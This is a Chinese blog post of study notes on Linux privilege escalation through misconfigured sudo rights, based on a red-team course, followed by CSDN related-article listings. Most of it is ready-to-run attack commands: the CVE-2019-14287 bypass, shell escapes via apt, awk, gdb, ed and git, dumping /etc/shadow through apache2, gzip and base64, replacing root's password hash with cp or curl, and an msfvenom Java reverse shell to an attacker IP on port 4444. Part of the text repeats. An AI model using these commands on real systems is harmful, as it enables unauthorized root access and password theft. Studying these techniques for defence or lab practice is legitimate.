sudo风暴

于 2024-05-23 18:58:26 发布
阅读量673 收藏 18
点赞数 29
分类专栏: 学习笔记 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_82000839/article/details/139155414
版权

sudo风暴

sudo -l 进行枚举,寻找相符合条件进行提权

欢迎关注微信公众号交流

qrcode_for_gh_e5fc05804a3e_430

CVE-2019-14287

sudo -u jack /bin/bash

sudo -u#1000 /bin/bash #另一种方式

sudo -u#-1 /bin/bash #-1会被sudo算法解释成0

利用条件:sudo版本1.8.28之前

image-20240523163643430

sudo apt

sudo apt update -o APT::Update::Pre-Invoke::=/bin/bash
  • -o指定APT选项
  • 冒号类似于名字空间,逐级访问子配置
  • 最终执行的是启动bash会话

image-20240523164129735

sudo apache2

sudo apache2 -f /etc/shadow
  • 执行时因为给定的配置文件是错误的,那么报错会显示root哈希值

image-20240523170222956

  • -f是对敏感文件进行泄露

image-20240523170200690

  • 如果用户名后有 y y y,则表明密码已使用yescrypt进行哈希处理
  • 使用format参数指定crypt

image-20240523170313346

sudo ash

image-20240523170607519

  • 新启一个bash会话获得新的交互性

  • ash本身就是一个shell

sudo awk

sudo awk 'BEGIN {system("/bin/bash")}'
  • 单引号内容为传递给awk的一个脚本
  • BEGIN 是awk的一个特殊模式,表示在处理任何输入之前执行的动作,而我们让他执行的动作是系统命令启动bin/bash的shell环境

image-20240523171116777

sudo base64

image-20240523171423611

声明一个变量

因为sudo有base64权限,我们先把声明变量进行编码然再进行解码,但是它看到的却是用sudo base64权限来完成的。这样我们就获得了敏感信息

image-20240523171823642

john破解

image-20240523172144907

base32、58、nc 等都可以同样方法

sudo bash

image-20240523172308250

  • 其他shell环境(本身就是shell):csh\dash\sh\tclsh\zsh

sudo cp

  • mkpasswd生成明文密码哈希
  • -m指定加密方法
  • 一般shadow为sha-512哈希加密

image-20240523172629186

将root哈希替换成刚刚生成的哈希

image-20240523172848937

声明一个环境变量RedteamNotes指向/etc/shadow

再声明一个TF=$(mktemp)指向是mktemp生成的临时文件

将生成的shadow记录写到TF变量之中

image-20240523173513149

image-20240523173741233

sudo cpulimit

sudo cpulimit -l 100 -f /bin/bash

-l 指定使用率100%

-f 指定程序按照-l参数去使用cpu比例

sudo curl

前期环境创造与sudo cp 相同

攻击机做一个sudo php的简易web服务器

image-20240523174739130

靶机执行

sudo curl http://192.168.218.145/shadow_entry -o /etc/shadow

-o 输出

sudo date

会泄露出敏感信息

image-20240523175114034

进行哈希值破解

sudo ed

sudo /usr/bin/ed
!/bin/bash

!执行系统命令

  • 2>/dev/null 扔掉垃圾信息

sudo env

env设置和显示变量的值

image-20240523180153631

sudo expect

image-20240523180742175

sudo find

image-20240523181600570

分号必须被转义,本身命令行的分隔符,不加反斜杠shell会将分号解释为命令分隔符,会导致exec没有结束,引发错误

sudo flock

协调多个进程对多个进程的访问

image-20240523182204299

sudo ftp

image-20240523182257672

sudo gcc

包装器-wrapper

,-s bash参数指定从标准输入读取命令,使bash在读取到eof时不会退出,

. gcc要编译内容

image-20240523182647676

sudo gdb

sudo gdb -nx -ex '!bash' -ex quit

image-20240523183614961

sudo git

sudo git branch --help

image-20240523183820179

image-20240523183759571

sudo gzip/gunzip

-t 检查压缩文件(试着去读取)

shadow时纯文本文件,在读取时会把信息显露出来

-f force 强制执行

sudo gzip -f /etc/shadow -t

sudo hping3

image-20240523184310288

sudo iftop

/bin/bash

sudo java

sudo msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f jar -o shell.jar

生成反弹shell

10.10.10.10为攻击机地址

开启简易服务器传递shell文件

sudo php -S 0:80

靶机进行下载wget

运行jar文件:java -jar shell.jar

攻击机监听4444端口

接受反弹

后续继续学习

「红队笔记」Linux提权精讲:Sudo风暴 - Sudo风暴全70讲,扫地僧级别心法,研究提权技术的同时,打磨你对linux内核的深度理解。渗透测试宝典。_哔哩哔哩_bilibili

va -jar shell.jar

攻击机监听4444端口

接受反弹

后续继续学习

「红队笔记」Linux提权精讲:Sudo风暴 - Sudo风暴全70讲,扫地僧级别心法,研究提权技术的同时,打磨你对linux内核的深度理解。渗透测试宝典。_哔哩哔哩_bilibili

53分钟

lu-fe1
关注
  • 29
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
linux提权之sudo风暴
人若无名,便可专心练剑
02-26 690
Linux提权精讲:Sudo风暴 - Sudo风暴全70讲,扫地僧级别心法,研究提权技术的同时,打磨你对linux内核的深度理解。渗透测试宝典
CTF靶机 Agent sudo 笔记
z4yn:)的博客
06-23 885
Agent sudo 靶机介绍 : 你在深海里发现了一个秘密服务器。你的任务是侵入服务器内部并揭示真相。 靶机标签 : 枚举, 利用, 爆破, hash破解 Nmap扫一下发现3个开放端口 21, 22, 80 先访问80端口 访问网站需要修改User-Agent 为C才能触发到指定页面 可用BurpSuite抓包修改 也可以用kali自带的curl自定义请求包 curl -A "C" -L 10.10.183.111 发现一个用户名chris,根据提示要用这个用户名去爆破ftp协议 用Burp Sui
渗透测试:Linux提权精讲(三)之sudo方法第三期
Bossfrank的博客
08-01 1028
本文详解了渗透测试过程种获取初始立足点(通常是某个shell)后的利用sudo指令的提权方法(第三期),并对提权的原理和本质进行了介绍。总结了23种sudo提权方法,分别是:sudo jjs,journalctl,knife,less,man,more,mount,mysql,nano,neofetch,nice,nmap,node,nohup,openvpn,passwd,perl,php,pico,pkexec,python3,rvim,scp.
linux 提权-sudo提权
mingyqf的博客
10-26 2171
sudo -l 前言 最近听闻sudo刚刚出来了新漏洞,而最近正好在看linux提权这块知识点。借此梳理一下sudo提权相关的姿势。 简介 sodu 全称 Substitute User and Do,用来临时赋予root权限运行某个程序。 sodu 的执行原理: 普通用户执行命令时,首先检查/var/run/sudo/目录下是否有用户时间戳,centos检查/var/db/sudo/目录,并检查是否过期。如果时间戳过期,就需要输入当前用户的密码。输入后检查/etc/sudoers配置文件,查看用.
渗透测试:Linux提权精讲(四)之sudo方法第四期
Bossfrank的博客
09-05 718
本文详解了渗透测试过程种获取初始立足点(通常是某个shell)后的利用sudo指令的提权方法(第四期),并对提权的原理和本质进行了介绍。总结了19种sudo提权方法,分别是:sudo screen, tmux, script, sed, service, socat, ssh, ssh-keygen, strace, systemctl, tcpdump, tee, timedatectl, tmux, vi, wall, watch, wget, xxd, zip。详细利用也可见GTOFBins。
sudo下的npm无法升级-sudo npm -v 与 npm -v版本号是不一样的
齐殿空间
07-06 806
快上线了发现环境有问题。。。发现问题出状况了怎么解决呢 发现问题 新增了一个上传文件的功能,用到strongloop,需要npm install strongloop依赖包,但是到线上测试安装时,发现总是报错: npm ERR! typeerror Error: Missing required argument #1 npm ERR! typeerror at andLogAndFinish (/usr/lib/node_modules/npm/lib/fetch-package-metadata
解决:网络风暴引起的无法ping通
u014426028的博客
01-25 1040
问题:单板上电加载交换芯片驱动后,PC与单板ping不通。 原因:网络收发包中断挂在T2080的CPU2(核2),网络风暴导致T2080的CPU2一直忙于处理收发包中断,导致CPU2占用率到100%,无法处理ping请求。 解决办法:交换芯片端口划分vlan,阻止网络风暴的发生。 中断亲和性和线程亲和性很像~ ---------------------------------------------------------------------------------------------...
广播风暴对比实验部署
weixin_34389926的博客
05-26 327
为什么80%的码农都做不了架构师?>>> ...
叛乱沙漠风暴server安装 ubuntu 22.04
星光的专栏
10-26 506
最新版沙暴已经不支持centos了,还是使用ubuntu比较顺利。// 安装steamcmd依赖。
Debian如何限制sudo权限
04-01
能学到什么:设置普通用户执行sudo的权限,使其只能执行指定的命令。 用户使用su命令切换root。但是权限太大,而且root密码有泄露风险。那么能否在不泄露root密码的前提下对权限进行限制呢?答案就是用sudosudo...
sudo命令详解
01-09
1、初识sudo   sudo是linux下常用的允许普通用户使用超级用户权限的工具,允许系统管理员让普通用户执行一些或者全部的root命令,如halt,reboot,shutdown、init等等。这样不仅减少了root用户的登陆和管理时间,...
linux的sudo详解
09-10
sudo.pdf
sudo-1.8.21
03-04
w
sudo_update.zip
02-05
单机升级,批量升级
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8288
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
chromedriver-win64_116.0.5840.0.zip
最新发布
06-15
chromedriver-win64_116.0.5840.0.zip
基于Java Servlet实现的灾情控制系统.zip
06-15
该资源内项目源码是个人的课程设计、毕业设计,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! ## 项目备注 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 该资源内项目源码是个人的课程设计,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! ## 项目备注 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。
计算机毕业设计-求职与招聘.zip
06-15
计算机毕业设计资源包含(项目部署视频+源码+LW+开题报告等等),所有项目经过助教老师跑通,有任何问题可以私信博主解决,可以免费帮部署。
sudosudo -
08-31
sudo 是一种在 Linux 和 Unix 操作系统中使用的命令,它允许普通用户以超级用户(也称为管理员或 root 用户)的身份执行特权操作。通过使用 sudo 命令,普通用户可以临时获取更高的权限来执行需要特权的命令或访问...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

lu-fe1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值